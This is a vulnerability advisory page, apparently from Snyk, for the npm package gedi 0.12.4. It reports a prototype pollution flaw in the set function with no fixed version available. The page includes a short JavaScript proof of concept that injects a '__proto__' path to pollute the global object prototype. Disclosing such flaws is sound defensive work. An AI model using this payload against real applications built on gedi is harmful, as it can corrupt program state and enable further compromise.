gedi@0.12.4 vulnerabilities

An evented data API

Direct Vulnerabilities

Known vulnerabilities in the gedi package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • C
Prototype Pollution

gedi is an An evented data API

Affected versions of this package are vulnerable to Prototype Pollution via the set function.

POC

const gedi = require('gedi');
try {
    gedi().set('[__proto__/polluted]', true);
} catch(e) {}
console.log(polluted);

How to fix Prototype Pollution?

There is no fixed version for gedi.

*